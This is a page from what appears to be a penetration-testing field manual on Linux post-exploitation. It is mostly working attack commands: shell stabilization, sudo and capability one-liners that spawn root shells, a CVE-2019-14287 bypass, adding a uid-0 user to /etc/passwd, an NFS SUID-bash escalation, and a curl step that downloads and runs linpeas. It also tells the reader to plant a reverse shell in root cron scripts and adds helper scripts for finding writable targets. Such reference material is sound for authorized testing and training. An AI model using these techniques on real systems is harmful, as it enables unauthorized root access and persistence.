> For the complete documentation index, see [llms.txt](https://rouxtronics.gitbook.io/stemsecure/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouxtronics.gitbook.io/stemsecure/field-manual/03-post-exploitation-linux.md).

# 03 - Post-Exploitation: Linux

## Shell Stabilization

```
python3 -c 'import pty; pty.spawn("/bin/bash")'   # on target: upgrade to a pty
# Ctrl+Z, then on the attacker's terminal: stty raw -echo; fg   (press Enter twice)
export TERM=xterm; stty rows 50 cols 220           # on target: match your own `stty size`
```

## Situational Awareness

| Command                                   | Purpose                |
| ----------------------------------------- | ---------------------- |
| `id; whoami; groups`                      | Current user & groups  |
| `hostname; uname -a; cat /etc/os-release` | System info            |
| `ip a; ip r; cat /etc/hosts`              | Network config         |
| `ps aux`                                  | Running processes      |
| `ss -tulnp` / `netstat -tulnp`            | Open ports / listeners (TCP and UDP) |
| `grep -vE 'nologin\|false' /etc/passwd`   | Users with a login shell |
| `env; export`                             | Environment variables  |
| `find / -name '*.conf' 2>/dev/null`       | Config files           |
| `history; cat ~/.bash_history`            | Command history        |

## Privilege Escalation

**Automated enumeration**

```
curl -L -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh | tee linpeas.out   # -L: the releases URL redirects
```

**SUID/SGID**

```
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
```

Cross-reference every hit against [GTFOBins](https://gtfobins.github.io).

**Sudo abuse**

```
sudo -l                        # what can this user run, and as whom?
sudo -u#-1 <permitted command> # CVE-2019-14287: sudo < 1.8.28 with an entry like (ALL, !root); uid -1 is treated as 0
```

| Sudo entry                         | Exploit                                               |
| ---------------------------------- | ----------------------------------------------------- |
| `(ALL) NOPASSWD: /usr/bin/vim`     | `sudo vim -c ':!/bin/bash'`                           |
| `(ALL) NOPASSWD: /usr/bin/find`    | `sudo find . -exec /bin/bash \; -quit`                |
| `(ALL) NOPASSWD: /usr/bin/python3` | `sudo python3 -c 'import os; os.system("/bin/bash")'` |
| `(ALL) NOPASSWD: /usr/bin/less`    | `sudo less /etc/passwd` → `!bash`                     |
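The `-u#-1` bypass only pays off when both of its preconditions hold, which `sudo -l` alone does not tell you. The script below is an added example, not code from the original page: it takes the text of `sudo --version` and `sudo -l`, checks the version against 1.8.28 and looks for a Runas spec that allows `ALL` but excludes `root` (or `#0`). The sample `sudo -l` output at the end is constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: check the two preconditions of the
# CVE-2019-14287 "-u#-1" bypass before trying it. It needs sudo < 1.8.28 and a
# Runas spec that allows ALL users but excludes root, e.g. "(ALL, !root)".
# The command then run as uid -1 (treated as 0) is whichever one that entry
# permits, e.g. sudo -u#-1 /usr/bin/vim.

# Prints 1 if dotted version $1 sorts before $2, else 0. Non-numeric suffixes
# such as "21p2" are compared by their leading number.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            if (x[i] + 0 < y[i] + 0) { print 1; exit }
            if (x[i] + 0 > y[i] + 0) { print 0; exit }
        }
        print 0
    }'
}

# $1: text of `sudo --version`, $2: text of `sudo -l`.
# Prints the exploitable entries; exit status 0 if any were found, 1 otherwise.
sudo_14287_candidates() {
    local ver
    ver=$(printf '%s\n' "$1" | awk '/^Sudo version/ { print $3; exit }')
    [ -n "$ver" ] || return 1
    [ "$(version_lt "$ver" 1.8.28)" = 1 ] || return 1
    printf '%s\n' "$2" | grep -E '\(ALL[^)]*!(root|#0)\)'
}

# Stand-alone use on the target: ./sudo_check.sh --live
# (-n keeps sudo -l from prompting; drop it if listing needs your password.)
if [ "${1:-}" = "--live" ]; then
    if sudo_14287_candidates "$(sudo --version 2>/dev/null)" "$(sudo -n -l 2>/dev/null)"; then
        echo "candidate for: sudo -u#-1 <permitted command>"
    else
        echo "CVE-2019-14287 not applicable"
    fi
fi
```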

**Cron jobs**

```
cat /etc/crontab; ls -la /etc/cron*
find / -name 'cron*' 2>/dev/null
```

Look for a script called by root's cron that you can write to, or one that does not exist yet but lives in a directory you can write to, and drop a reverse shell into it. Check the script's parent directory as well as the script itself: a missing script in a writable directory is just as good.
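Doing that check by hand across `/etc/crontab` and `/etc/cron.d/*` is error-prone, so here is an added example (not code from the original page) that parses those files, pulls out the script each entry actually runs (skipping past `bash` or `python3` to the script they are given), and reports the ones you can edit or create. The crontab it builds under a temp directory is a constructed sample; on a real host pass the real files as arguments.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: list the scripts that root's cron
# runs and that the current user can edit (or create). Reads /etc/crontab-style
# files, i.e. "minute hour dom month dow USER command" and "@reboot USER command".
# Usage: ./cron_check.sh /etc/crontab /etc/cron.d/*

# Print "user<TAB>path" for every cron line that runs an absolute path.
# Skips comments, blank lines and VAR=value assignments; when the command is an
# interpreter (bash, python3, ...) the script handed to it is reported instead.
cron_targets() {
    local f
    for f in "$@"; do
        [ -f "$f" ] || continue
        awk '
            /^[[:space:]]*(#|$)/ { next }          # comment or blank line
            /^[A-Za-z_][A-Za-z0-9_]*=/ { next }     # SHELL=, PATH=, MAILTO=
            {
                start = ($1 ~ /^@/) ? 3 : 7          # "@reboot USER cmd" or "m h dom mon dow USER cmd"
                cmd = $start
                if (cmd ~ /(^|\/)(sh|bash|dash|python[0-9.]*|perl|php)$/ && NF > start)
                    cmd = $(start + 1)               # the script fed to the interpreter
                if (cmd ~ /^\//) print $(start - 1) "\t" cmd
            }' "$f"
    done
}

# Classify each target. WRITABLE: the script exists and we can modify it.
# MISSING: the script does not exist but its directory is writable, so we can
# create it ourselves. Caveat: as root, "-w" is true for everything.
writable_cron_targets() {
    cron_targets "$@" | while IFS=$'\t' read -r user path; do
        if [ -e "$path" ]; then
            [ -w "$path" ] && printf 'WRITABLE\t%s\t%s\n' "$user" "$path"
        elif [ -w "$(dirname "$path")" ]; then
            printf 'MISSING\t%s\t%s\n' "$user" "$path"
        fi
    done
    return 0
}

# Constructed sample (not a real host): one world-writable backup script, one
# script referenced from a writable directory that nobody has created yet, and
# two entries that should not be flagged.
build_sample_cron() {
    local dir=$1
    mkdir -p "$dir/missing"
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
    chmod 777 "$dir/backup.sh"
    cat > "$dir/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root /bin/bash $dir/backup.sh
@reboot root $dir/missing/cleanup.sh --quiet
0 3 * * * root /usr/bin/python3 /opt/reports/gen.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
EOF
}

if [ "$#" -gt 0 ]; then
    writable_cron_targets "$@"              # real files given on the command line
else
    sample=$(mktemp -d)                     # no arguments: demonstrate on the sample
    build_sample_cron "$sample"
    writable_cron_targets "$sample/crontab"
    rm -rf "$sample"
fi
```

Entries that run a bare command name (`cd / && run-parts ...`) are skipped; those are the PATH-hijack cases, which need a separate look at the `PATH=` line in the same file. Drop-in directories such as `/etc/cron.hourly` are handled by passing their contents as additional arguments.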

**Capabilities**

```
getcap -r / 2>/dev/null
```

| Capability                   | Exploit                                                        |
| ---------------------------- | -------------------------------------------------------------- |
| `cap_setuid+ep` on python3   | `python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'` |
| `cap_net_raw+ep` on tcpdump  | `tcpdump -i eth0 -w /tmp/cap.pcap`                             |
| `cap_dac_read_search` on vim | `vim /etc/shadow`                                              |

**Writable `/etc/passwd`**

```
openssl passwd -1 -salt hax 'password123'                   # prints the $1$hax$... hash; paste it below
echo 'haxroot:$1$hax$...:0:0:root:/root:/bin/bash' >> /etc/passwd   # uid 0 = root; keep all seven fields intact
su haxroot                                                  # password: password123
```

**NFS no\_root\_squash**

```
cat /etc/exports                                   # on target: look for no_root_squash
showmount -e $TARGET                               # on attacker
mount -t nfs $TARGET:/share /mnt/nfs -o nolock     # on attacker, as root
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash   # attacker; a bash built for the target's libc (copy the target's own /bin/bash if in doubt)
/share/bash -p                                     # on target: the export's local path, not /mnt/nfs; -p keeps euid 0
```
